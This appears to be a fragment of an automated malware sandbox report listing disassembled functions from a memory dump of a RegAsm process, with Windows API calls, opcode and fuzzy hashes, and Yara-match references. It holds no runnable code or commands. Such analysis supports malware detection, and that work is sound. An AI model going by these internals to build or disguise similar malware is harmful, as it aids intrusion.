                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1717984340-0
                                                  • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                  • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99